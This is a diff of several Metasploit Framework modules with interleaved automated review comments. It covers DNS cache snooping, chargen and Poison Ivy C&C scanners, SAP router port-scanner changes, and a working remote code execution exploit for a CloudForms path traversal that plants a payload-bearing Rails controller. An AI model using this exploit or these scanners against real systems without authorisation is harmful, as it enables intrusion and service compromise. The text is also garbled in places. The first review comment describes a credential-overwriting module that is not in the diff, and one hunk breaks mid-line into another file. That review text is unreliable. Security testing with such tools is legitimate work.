-77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) + if ports.empty? + raise Msf::OptionValidateError.new(['PORTS']) + end + ports.each_with_index do |port,i| p.tcp_dst = port p.tcp_src = rand(64511)+1024 diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb new file mode 100644 index 0000000000..bc3294ce3a --- /dev/null +++ b/modules/auxiliary/gather/dns_cache_scraper.rb 
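Review bot: The Description and `run` do not say that this module permanently overwrites the target account's stored credential: `value_for_newer_schema` and `value_for_older_schema` issue an UPDATE and nothing visible saves or restores the previous value. I would add a sentence to the Description such as `The previous password is overwritten and is not restored by this module.` so that operators on an authorised engagement plan for the account change. Separately, `run` calls `print_error('Failed to reset password')` after the first attempt and then continues with the older-schema request, so a run that succeeds on the second attempt still logs a failure; a `print_status` there would be clearer. The header comment also reads `http//metasploit.com/download`, missing the colon.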
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/dns/resolver'
+
+class Metasploit3 < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DNS Non-Recursive Record Scraper',
+ 'Description' => %q{
+ This module can be used to scrape records that have been cached
+ by a specific nameserver. The module allows the user to test
+ every record from a specified file.
+ },
+ 'Author' => [
+ 'Brandon McCann "zeknox" ',
+ 'Rob Dixon "304geek" '
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
+ ['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
+ ]))
+
+ register_options([
+ OptString.new('DOMAIN', [ false, "Domain name to query for"]),
+ OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]),
+ OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]),
+ ], self.class)
+
+ register_advanced_options([
+ OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
+ OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5])
+ ], self.class)
+ end
+
+ # method to scrape dns
+ def scrape_dns(domain)
+
+ # dns request with recursive disabled
+ use_tcp = datastore['TCP_DNS']
+ res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp)
+ use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT']
+
+ # query dns
+ begin
+ query = res.send(domain)
+ rescue ResolverArgumentError
+ print_error("Invalid domain: #{domain}")
+ return
+ rescue NoResponseError
+ print_error("DNS Timeout Issue: #{domain}")
+ return
+ end
+
+ # found or not found
+ if query.answer.empty?
+ vprint_status("#{domain} - Not Found")
+ return
+ end
+
+ @is_vulnerable = true
+ print_good("#{domain} - Found")
+ report_goods(domain)
+ end
+
+ # method to read each line from file
+ def read_file
+ ::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line|
+ scrape_dns(line.chomp)
+ end
+ end
+
+ # log results to database
+ def report_goods(domain)
+ if datastore['TCP_DNS']
+ proto = "tcp"
+ else
+ proto = "udp"
+ end
+
+ report_note(
+ :host => datastore['NS'],
+ :name => "dns",
+ :port => 53,
+ :proto => proto,
+ :type => "dns.cache.scrape",
+ :data => "#{domain} cached",
+ :update => :unique_data
+ )
+ end
+
+ # main control method
+ def run
+ @is_vulnerable = false
+
+ print_status("Making queries against #{datastore['NS']}")
+
+ if datastore['DOMAIN'].blank?
+ read_file
+ else
+ scrape_dns(datastore['DOMAIN'])
+ end
+
+ report_vuln(
+ :host => datastore['NS'],
+ :name => "DNS Cache Snooping",
+ ) if @is_vulnerable
+ end
+end
+
diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb
new file mode 100644
index 0000000000..2332fe5995
--- /dev/null
+++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb
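Review bot: `read_file` opens the wordlist with `::File.open(...).each_line` and never closes it, so the handle stays open until garbage collection; the block form, `::File.open(datastore['WORDLIST'], "rb") { |f| f.each_line { |line| scrape_dns(line.chomp) } }`, closes it deterministically. Blank lines in the wordlist are passed to `scrape_dns` as empty names; `next if line.strip.empty?` would skip them. `WORDLIST` is registered as optional, so with both `DOMAIN` and `WORDLIST` unset `run` reaches `read_file` with an empty path; an explicit check with a clear error would be friendlier than the exception from `File.open`.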
@@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::Udp
+
+ def initialize
+ super(
+ 'Name' => 'Chargen Probe Utility',
+ 'Description' => %q{
+ Chargen is a debugging and measurement tool and a character
+ generator service. A character generator service simply sends
+ data without regard to the input.
+ Chargen is susceptible to spoofing the source of transmissions
+ as well as use in a reflection attack vector. The misuse of the
+ testing features of the Chargen service may allow attackers to
+ craft malicious network payloads and reflect them by spoofing
+ the transmission source to effectively direct it to a target.
+ This can result in traffic loops and service degradation with
+ large amounts of network traffic.
+ },
+ 'Author' => 'Matteo Cantoni ',
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
+ [ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ], + [ 'URL', 'http://tools.ietf.org/html/rfc864' ], + ], + 'DisclosureDate' => 'Feb 08 1996') + + register_options([ + Opt::RPORT(19) + ]) + + deregister_options('RHOST') + end + + def run_host(rhost) + begin + connect_udp + pkt = Rex::Text.rand_text_alpha_lower(1) + udp_sock.write(pkt) + r = udp_sock.recvfrom(65535, 0.1) + + if r and r[1] + vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}") + res = r[0].to_s.strip + if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/)) + print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)") + report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length) + end + end + rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused + nil + ensure + disconnect_udp if self.udp_sock + end + end +end diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 87dfc5938c..b879573782 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary @probes << 'probe_pkt_citrix' @probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_nq' + @probes << 'probe_chargen' end @@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary case pkt[2] + when 19 + app = 'chargen' + return unless chargen_parse(pkt[0]) + @results[hkey] = true + when 53 app = 'DNS' ver = nil @@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary "#{res[2]}_#{res[1]}" end + # + # Validate a chargen packet. + # + def chargen_parse(data) + data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i + end + # # Validate this is truly Citrix ICA; returns true or false. # 
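Review bot: `report_service` in `run_host` of chargen_probe.rb is called without `:proto`, so the chargen service is likely to be recorded with the framework's default protocol rather than UDP; passing `:proto => 'udp'` makes it explicit. The `print_good` text says the length covers "headers + UDP payload", but `res` is `r[0].to_s.strip`, the stripped payload only, so either the wording or the measured value should change. `:info => res.length` also stores a bare integer; a string such as `"#{res.length} byte response"` would read better in the service table.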
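Review bot: The `when 19` branch added to udp_probe.rb sets only `app`, whereas the matching branch added to udp_sweep.rb in this commit also sets `ver = nil`; if the code after the `case` (outside this hunk) reads `ver`, the two scanners will behave differently, so I would add `ver = nil` here too. `chargen_parse` and `probe_chargen` are added verbatim to both udp_probe.rb and udp_sweep.rb, and a shared helper would keep the pattern in one place. `probe_chargen` also takes an `ip` argument it does not use, which deserves a one-line comment if it is only there to match the other probe signatures.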
@@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary # The probe definitions # + def probe_chargen(ip) + pkt = Rex::Text.rand_text_alpha_lower(1) + return [pkt, 19] + end + def probe_pkt_dns(ip) data = [rand(0xffff)].pack('n') + "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+ diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index 0051304bba..8f87a3c498 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary @probes << 'probe_pkt_citrix' @probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_nq' + @probes << 'probe_chargen' end def setup @@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary case sport + when 19 + app = 'chargen' + ver = nil + return unless chargen_parse(data) + @results[hkey] = true + when 53 app = 'DNS' ver = nil @@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})") end + # + # Validate a chargen packet. + # + def chargen_parse(data) + data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i + end + # # Parse a db2disco packet. # @@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary # The probe definitions # + def probe_chargen(ip) + pkt = Rex::Text.rand_text_alpha_lower(1) + return [pkt, 19] + end + def probe_pkt_dns(ip) data = [rand(0xffff)].pack('n') + "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+ diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 7d189950b6..970bea0a69 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb 
@@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary dead = false portlist = Rex::Socket.portspec_crack(datastore['PORTS']) + if portlist.empty? + raise Msf::OptionValidateError.new(['PORTS']) + end + vprint_status("[#{rhost}] Verifying manual testing is not required...") manual = false diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index c8429f9a9c..39c02bac5a 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb 
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary if (res and res.body) short_name = res.body.scan(/ 'Poison Ivy Command and Control Scanner', + 'Description' => %q{ + Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script. + }, + 'References' => + [ + ['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'], + ], + 'Author' => ['SeawolfRN'], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]), + OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]), + OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10]) + ], self.class) + + deregister_options('RPORT') + + end + + + def run_host(ip) + + timeout = datastore['TIMEOUT'].to_i + + ports = Rex::Socket.portspec_crack(datastore['PORTS']) + + if ports.empty? + raise Msf::OptionValidateError.new(['PORTS']) + end + + while(ports.length > 0) + t = [] + r = [] + begin + 1.upto(datastore['CONCURRENCY']) do + this_port = ports.shift + break if not this_port + t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port| + begin + s = connect(false, + { + 'RPORT' => port, + 'RHOST' => ip, + 'ConnectTimeout' => (timeout / 1000.0) + } + ) + r << [ip,port,"open",'Unknown'] + s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer + data = s.get_once(0x100) + if data.length == 0x100 + data = s.get_once(0x4) + if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C + print_status("#{ip}:#{port} - C&C Server Found") + r << [ip,port,"open",'Poison Ivy C&C'] + end + end + rescue ::Rex::ConnectionRefused + vprint_status("#{ip}:#{port} - TCP closed") + r << [ip,port,"closed",''] + rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error + rescue ::Rex::Post::Meterpreter::RequestError + raise $! 
+ ensure + disconnect(s) rescue nil + end + end + end + t.each {|x| x.join } + + rescue ::Timeout::Error + ensure + t.each {|x| x.kill rescue nil } + end + + r.each do |res| + report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3]) + end + end + end + +end diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index aa6f32d6ab..ad5b2a0b7b 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index 6909cc0ecb..46dbe302ac 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end datastore['RHOST'] = datastore['BOUNCEHOST'] diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index c45cfc4721..b8f6a34c1e 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 5695228f8f..87204f77c7 100644 
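Review bot: In `run_host`, `data.length` is called on the result of `s.get_once(0x100)` without a nil check, and a peer that accepts the connection but sends nothing would most likely make `get_once` return nil. The resulting NoMethodError is not among the rescued classes, so it would surface inside the spawned thread instead of the port simply being recorded as open; `if data and data.length == 0x100` avoids that. A port that matches the signature is also appended to `r` twice, once as 'Unknown' and once as 'Poison Ivy C&C', so `report_service` runs twice for it. The first lines of this file's hunk are not intact on the page, so only `run_host`, which is fully visible, was reviewed.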
--- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end while(ports.length > 0) diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 1cccc48c5a..136e7941b2 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index 3114a85d2a..16b1c4e3d8 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary ], 'Author' => [ - 'Royce Davis @R3dy_ ', - 'Brandon McCann @zeknox ' + 'Royce Davis "R3dy" ', + 'Brandon McCann "zeknox" ' ], 'License' => MSF_LICENSE )) diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index ef456cca26..a0e5f758f9 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner + + VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/ def initialize super( 
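Review bot: `VALID_HOSTNAME_REGEX` is anchored with `^` and `$`, which in Ruby match at every line boundary, so a TARGETS entry containing a newline passes as long as one of its lines looks like a hostname. The constant is what `validate` in the later `@@ -266,11 +275,40 @@` hunk relies on before each entry is placed into the route sent to the SAProuter, so it should match the whole string: replace the leading `^` with `\A` and the trailing `$` with `\z`. The class body continues outside this hunk.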
@@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']), - OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']), + OptAddress.new('RHOST', [true, 'SAPRouter address', '']), + OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']), + OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']), OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]), OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']), OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']), @@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary # 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002, # 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]), + OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']]) ], self.class) - deregister_options('RPORT') - end # Converts a instance specification like "4,21-23,33" into a sorted, @@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary vprint_error("#{ip}:#{port} - invalid route") when /reacheable/ vprint_error("#{ip}:#{port} - unreachable") + when /hostname '#{ip}' unknown/ + vprint_error("#{ip}:#{port} - unknown host") + when /GetHostByName: '#{ip}' not found/ + vprint_error("#{ip}:#{port} - unknown host") + when /connection to .* timed out/ + vprint_error("#{ip}:#{port} - connection timed out") + when /partner .* not reached/ + vprint_error("#{ip}:#{port} - host unreachable") else vprint_error("#{ip}:#{port} - unknown error message") end 
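Review bot: The new `when /hostname '#{ip}' unknown/` and `when /GetHostByName: '#{ip}' not found/` branches interpolate `ip` into the pattern unescaped, so every `.` in an address or hostname matches any character. With RESOLVE set to remote the value is an operator-supplied name and the comparison should be literal: `when /hostname '#{Regexp.escape(ip)}' unknown/` and `when /GetHostByName: '#{Regexp.escape(ip)}' not found/`. The enclosing `case` starts outside the hunk.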
@@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary return nil end + def validate(range) + hosts_list = range.split(",") + return false if hosts_list.nil? or hosts_list.empty? + + hosts_list.each do |host| + unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX + return false + end + end + end + + def run + + if datastore['RESOLVE'] == 'remote' + range = datastore['TARGETS'] + unless validate(range) + print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote") + return + end + + range.split(/,/).each do |host| + run_host(host) + end + else + # resolve IP or crack IP range + ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS']) + ip_list.each do |ip| + run_host(ip) + end + end + + end + def run_host(ip) - - sap_host = datastore['SAPROUTER_HOST'] - sap_port = datastore['SAPROUTER_PORT'] - ports = datastore['PORTS'] # if port definition has NN then we require INSTANCES @@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary ports = build_sap_ports(ports) if ports.empty? - print_error('Error: No valid ports specified') - return + raise Msf::OptionValidateError.new(['PORTS']) end print_status("Scanning #{ip}") @@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary begin # create ni_packet to send to saprouter - routes = {sap_host => sap_port, ip => port} + routes = {rhost => rport, ip => port} ni_packet = build_ni_packet(routes) - s = connect(false, - { - 'RPORT' => sap_port, - 'RHOST' => sap_host - } - ) + s = connect(false) s.write(ni_packet, ni_packet.length) response = s.get() 
@@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused - print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused") + print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused") rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error rescue ::Rex::Post::Meterpreter::RequestError @@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary r.each do |res| tbl << [res[0], res[1], res[2], res[3]] - report_service(:host => res[0], :port => res[1], :state => res[2]) + # we can't report if resolution is remote, since host is unknown locally + if datastore['RESOLVE'] == 'local' + begin + report_service(:host => res[0], :port => res[1], :state => res[2]) + rescue ActiveRecord::RecordInvalid + # Probably raised because the Address is reserved, for example + # when trying to report a service on 127.0.0.1 + print_warning("Can't report #{res[0]} as host to the database") + end + end end - print_warning("Warning: Service info could be innacurated") + print_warning("Warning: Service info could be inaccurate") print(tbl.to_s) end diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index 713ce9aec0..1d64e481e2 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb 
@@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary def_ports = [ '32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02', '5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16', - '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975', - '59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200', - '7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200', - '8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02', - '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17', - '20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602', - '31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352', - '8353', '8366', '1090', '1095', '20201', '1099', '1089' + '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00', + '3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', + '3NN11', '3NN17' ] + + static_ports = [ + '21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299', + '3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200', + '8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004', + '20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604', + '2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366', + '1090', '1095', '20201', '1099', '1089' + ] + ports = [] # Build ports array from valid instance numbers @@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary final_ports << dport.gsub("NN", inst) end end - + final_ports.push(*static_ports) ports = final_ports if ports.empty? 
@@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary end print_good("#{ip}:#{port}\t - #{service} OPEN") -=begin - report_note(:host => "#{ip}", - :proto => 'TCP', - :port => "#{port}", - :type => 'SAP', - :data => "#{service}") -=end - + begin + report_note( + :host => "#{ip}", + :proto => 'TCP', + :port => "#{port}", + :type => 'SAP', + :data => "#{service}" + ) + end r << [ip,port,"open", service] rescue ::Rex::ConnectionRefused vprint_status("#{ip}:#{port}\t - TCP closed") diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index df7ef7a44f..eee8afd461 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary # this is needed on windows cause we send interface directly to Pcap functions @interface = get_interface_guid(@interface) @iface_ip = datastore['LOCALIP'] - @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces + @iface_ip ||= get_ipv4_addr(@interface) if netifaces raise "Interface IP is not defined and can not be guessed" unless @iface_ip # start with blank slate diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb new file mode 100644 index 0000000000..270fe2af3d --- /dev/null +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb 
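Review bot: The `begin` and `end` that replace the old `=begin`/`=end` comment markers have no `rescue` or `ensure`, so they only add a nesting level around `report_note`; the call can stand on its own. The arguments also interpolate `ip`, `port` and `service` into new strings and pass `:proto => 'TCP'` in upper case, where the other modules in this diff pass the port value as it is. I would write `report_note(:host => ip, :proto => 'tcp', :port => port, :type => 'SAP', :data => service)`, assuming the framework expects the lower-case protocol name. The surrounding method starts outside the hunk.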
@@ -0,0 +1,150 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal', + 'Description' => %q{ + This module exploits a path traversal vulnerability in the "linuxpkgs" + action of "agent" controller of the Red Hat CloudForms Management Engine 5.1 + (ManageIQ Enterprise Virtualization Manager 5.0 and earlier). + It uploads a fake controller to the controllers directory of the Rails + application with the encoded payload as an action and sends a request to + this action to execute the payload. Optionally, it can also upload a routing + file containing a route to the action. (Which is not necessary, since the + application already contains a general default route.) + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2068'], + ['CWE', '22'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=960422'] + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => true, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DisclosureDate' => 'Sep 4 2013', + 'DefaultOptions' => + { + 'PrependFork' => true, + 'SSL' => true + }, + 'DefaultTarget' => 0 + ) + + register_options( + [ + Opt::RPORT(443), + OptString.new('CONTROLLER', [false, 'The name of the controller']), + OptString.new('ACTION', [false, 'The name of the action']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ]) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('ROUTES', [true, 'Upload a routing file. 
Warning: It is not necessary by default and can damage the target application', false]), + ], self.class) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "ping.html") + ) + + if res and res.code == 200 and res.body.to_s =~ /EVM ping response/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Unknown + end + + def exploit + controller = + if datastore['CONTROLLER'].blank? + Rex::Text.rand_text_alpha_lower(rand(9) + 3) + else + datastore['CONTROLLER'].downcase + end + + action = + if datastore['ACTION'].blank? + Rex::Text.rand_text_alpha_lower(rand(9) + 3) + else + datastore['ACTION'].downcase + end + + data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n" + + print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...") + res = upload_file("../../app/controllers/#{controller}_controller.rb", data) + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + register_files_for_cleanup("app/controllers/#{controller}_controller.rb") + # According to rcvalle, all the version have not been checked + # so we're not sure if res.code will be always 500, in order + # to not lose sessions, just print warning and proceeding + unless res and res.code == 500 + print_warning("Unexpected reply but proceeding anyway...") + end + + if datastore['ROUTES'] + data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n" + + print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...") + res = upload_file("../../config/routes.rb", data) + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? 
